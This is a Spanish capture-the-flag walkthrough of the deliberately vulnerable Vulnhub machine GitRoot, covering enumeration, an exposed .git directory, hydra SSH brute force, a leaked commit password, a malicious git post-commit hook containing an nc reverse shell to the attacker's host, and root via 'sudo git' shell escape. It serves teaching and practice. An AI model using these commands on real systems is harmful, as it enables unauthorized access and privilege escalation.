[VLN] GitRoot

Hoy vamos a hackear la maquina de Vulnhub llamada GitRoot:1. Podeis descargarla desde el siguiente enlace: GitRoot

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.45
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 22:39 CEST
Nmap scan report for GitRoot.home (192.168.1.45)
Host is up (0.0025s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 bf:45:f6:b3:e3:ce:0c:69:18:5a:5b:27:e5:d3:9c:86 (RSA)
|   256 b5:d7:45:50:06:c4:e2:3c:28:52:b8:06:26:1f:de:b0 (ECDSA)
|_  256 27:f0:d0:21:13:30:9c:5e:f0:70:a1:d8:5c:a7:8f:75 (ED25519)
80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hey Jen
11211/tcp open  memcache?
| fingerprint-strings: 
|   RPCCheck: 
|_    Unknown command
1 service unrecognized despite returning data. If you know the service/version, 
please submit the following fingerprint at 
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port11211-TCP:V=7.80%I=7%D=6/5%Time=5EDAADBC%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,27,"\x81\0\0\0\0\0\0\x81\0\0\0\x0f\0\0\0\x02\0\0\0\0\0\0\0\0Unkn
SF:own\x20command");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.69 seconds
Echamos un vistazo a la web http://192.168.1.45/ y vemos: Hey Jen, just installed wordpress over at wp.gitroot.vuln please go check it out! Asi que agregamos wp.gitroot.vuln a /etc/hosts. Ya que estamos, agregamos tambien: gitroot.vuln Escaneamos para ver si encontramos mas subdominios.

sml@Cassandra:~$ gobuster vhost -u gitroot.vuln -w 
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:          http://gitroot.vuln
[+] Threads:      10
[+] Wordlist:     
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
===============================================================
2020/06/05 22:42:29 Starting gobuster
===============================================================
Found: repo.gitroot.vuln (Status: 200) [Size: 438]
Found: wp.gitroot.vuln (Status: 200) [Size: 10697]
===============================================================
2020/06/05 22:43:10 Finished
===============================================================
Encontramos repo.gitroot.vuln asi que lo agregamos tambien al fichero /etc/hosts. Echamos un vistazo a ver si encontramos algo interesante en este nuevo subdominio.

sml@Cassandra:~$ gobuster dir -u repo.gitroot.vuln -w 
/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://repo.gitroot.vuln
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/07 23:21:35 Starting gobuster
===============================================================
/.git/HEAD (Status: 200)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/index.php (Status: 200)
/javascript (Status: 301)
/manual (Status: 301)
/server-status (Status: 403)
===============================================================
2020/06/07 23:21:39 Finished
===============================================================
Vemos que existe el directorio /.git. Los .git suelen tener siempre la misma estructura de ficheros, sabiendo esto visitamos http://repo.gitroot.vuln/.git/index y lo descargamos. Miramos si nos puede interesar algo...

sml@Cassandra:~/Descargas$ strings index
DIRC
D33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
GkL^
get.php
        index.php
3K*P'cg
pablo_HELP.txt
v;T&w^
set.php
GkL^
        stats.php
TREE
Existe el fichero pablo_HELP.txt, hacemos bruteforce al usuario pablo.

sml@Cassandra:~$ hydra -l pablo -P FU.txt 192.168.1.140 ssh -I
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 
12:18:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent 
overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try 
per task
[DATA] attacking ssh://192.168.1.140:22/
[22][ssh] host: 192.168.1.140   login: pablo   password: mastergitar
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 
12:18:33

Low Shell


Nos conectamos por ssh como "pablo" y la password que hemos obtenido "mastergitar" :)

sml@Cassandra:~/$ ssh pablo@192.168.1.180
pablo@GitRoot:~$ ls
public  user.txt
pablo@GitRoot:~$ cat user.txt

  _______ _                 _                          _____      _     _       
 |__   __| |               | |                        |  __ \    | |   | |     
    | |  | |__   __ _ _ __ | | __  _   _  ___  _   _  | |__) |_ _| |__ | | ___  
    | |  | '_ \ / _` | '_ \| |/ / | | | |/ _ \| | | | |  ___/ _` | '_ \| |/ _ \ 
    | |  | | | | (_| | | | |   <  | |_| | (_) | |_| | | |  | (_| | |_) | | (_) 
    |_|  |_| |_|\__,_|_| |_|_|\_\  \__, |\___/ \__,_| |_|   \__,_|_.__/|_|\___/ 
                                    __/ |                                       
                                   |___/                                        



Great job! Do not falter, there is more to do. You made it this far, finish the 
race!

"It's not that I'm so smart. Its just that I stay with problems longer." - 
Albert Einstein 

8a81007ea736a2b8a72a624672c375f9ac707b5e
Exploramos un poco mas...

pablo@GitRoot:~$ cd public
pablo@GitRoot:~/public$ ls -l
total 4
-rw-r--r-- 1 beth beth 58 May 25 23:08 message.txt
pablo@GitRoot:~/public$ cat message.txt 
Hey pablo

Make sure to check-out our brand new git repo!
Vemos que "beth" nos deja un mensaje donde indica que revisemos el nuevo repositorio git. Lo buscamos.

pablo@GitRoot:~/public$ find / -name .git 2>/dev/null
/opt/auth/.git
/var/www/repo/.git
El nuevo repositorio del que habla es: /opt/auth/.git Echamos un vistazo para ver todos los cambios que se han ido realizando y demas.

pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ cat *
----SNIP----
0000000000000000000000000000000000000000 
fc9901f3b6b303d6ad40cdb71689f1646904f7b3 Your Name  1590499965 
-0400  branch: Created from HEAD
fc9901f3b6b303d6ad40cdb71689f1646904f7b3 
b2ab5f540baab4c299306e16f077d7a6f6556ca3 Your Name  1590500014 
-0400  commit: init repo
b2ab5f540baab4c299306e16f077d7a6f6556ca3 
06fbefc1da56b8d552cfa299924097ba1213dd93 Your Name  1590500148 
-0400  commit: added some stuff
----SNIP----

pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ git show 
06fbefc1da56b8d552cfa299924097ba1213dd93
commit 06fbefc1da56b8d552cfa299924097ba1213dd93
Author: Your Name 
Date:   Tue May 26 09:35:48 2020 -0400

    added some stuff

diff --git a/main.c b/main.c
index 70e6397..8af9b9c 100644
--- a/main.c
+++ b/main.c
@@ -4,6 +4,15 @@
 int main(){
 
         char pass[20];
-       return 0;
+        scanf("%20s", pass);
+        printf("You put %s\n", pass);
+        if (strcmp(pass, "r3vpdmspqdb") == 0 ){
+                char *cmd[] = { "bash", (char *)0 };
+                execve("/bin/bash", cmd, (char *) 0);
+        }
+        else{
+                puts("BAD PASSWORD");
+        }
+        return 0;
 }
-//43
+
Vemos que en un commit, aparece la que podria ser la password de beth. Probamos :)

pablo@GitRoot:/tmp/j$ su beth
Password: r3vpdmspqdb
beth@GitRoot:~$ id
uid=1001(beth) gid=1001(beth) groups=1001(beth)
Ahora que tenemos los privilegios de beth, exploramos un poco.

beth@GitRoot:~$ cd ~
beth@GitRoot:~$ cd public
beth@GitRoot:~/public$ ls -l
total 4
-rw-r--r-- 1 jen jen 151 May 26 00:29 addToMyRepo.txt
beth@GitRoot:~/public$ cat addToMyRepo.txt 
Hello Beth

If you want to commit to my repository you can add a zip file to 
~jen/public/repos/ and ill unzip it and add it to my repository

Thanks!
En este caso parece que "jen" quiere que le dejemos un fichero zip en la carpeta que nos indica, y ella lo descomprimira y agregara a su repositorio. Vamos a jugar con los "hooks" y crear el post-commit, para asi despues de que jen haga el commit se ejecute. En nuestro caso crearemos una reverse shell.

beth@GitRoot:~/public$ cd /tmp
beth@GitRoot:~/tmp$ mkdir -p .git/hooks
beth@GitRoot:~/tmp$ cd .git/hooks
beth@GitRoot:~/tmp/.git/hooks$ nano post-commit
Y dentro del fichero post-commit ponemos:

#!/bin/sh
/usr/bin/nc -e /bin/bash 192.168.1.148 5555
Le damos los permisos, comprimimos y lo ponemos donde jen necesita.

beth@GitRoot:~/tmp/.git/hooks$ chmod 777 post-commit
beth@GitRoot:~/tmp/.git/hooks$ chmod +x post-commit
beth@GitRoot:~/tmp/.git/hooks$ cd /tmp
beth@GitRoot:~/tmp$ 7z a yo.zip .git/
beth@GitRoot:~/tmp$ chmod 777 yo.zip
beth@GitRoot:~/tmp$ cp yo.zip /home/jen/public/repos
Ponemos nuestro nc a la escucha en nuestra maquina.

sml@Cassandra:~$ nc -nlvp 5555
Al rato....

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.80] 52104
python -c 'import pty; pty.spawn("/bin/bash")'
$ id
uid=1003(jen) gid=1003(jen) groups=1003(jen)
Ahora que estamos como "jen" exploramos un poco el sistema. Vemos que tiene el fichero ~/.viminfo que contiene informacion que podria ser su password...

jen@GitRoot:~$ cd ~
jen@GitRoot:~$ cat .viminfo
---SNIP---
# This viminfo file was generated by Vim 8.1.
# Search String History (newest to oldest):
?/binzpbeocnexoe
|2,1,1590471908,47,"binzpbeocnexoe"

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
---SNIP----
Vamos a ver que podemos realizar con sudo, y usando la posible password que tiene en el fichero .viminfo.

Privilege Escalation



jen@GitRoot:~$ sudo -l    
[sudo] password for jen: binzpbeocnexoe

Matching Defaults entries for jen on GitRoot:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jen may run the following commands on GitRoot:
    (ALL) /usr/bin/git
Parece que funciona :) Bien, podemos usar "sudo git", el cual nos sirve para escalar privilegios. Asi que...

sudo git -p help config
!/bin/sh

#cd /root
# ls
passwords  POC  root.txt  setpasswords.php
# cat root.txt        
Thank you for completing my box! Please let my know what you liked and what you 
didn't like at my twitter @Recursive_NULL

734ae32be131cd0681f86c03858f4f587a3c69ce

End


Y con esto ya seriamos root de la maquina :)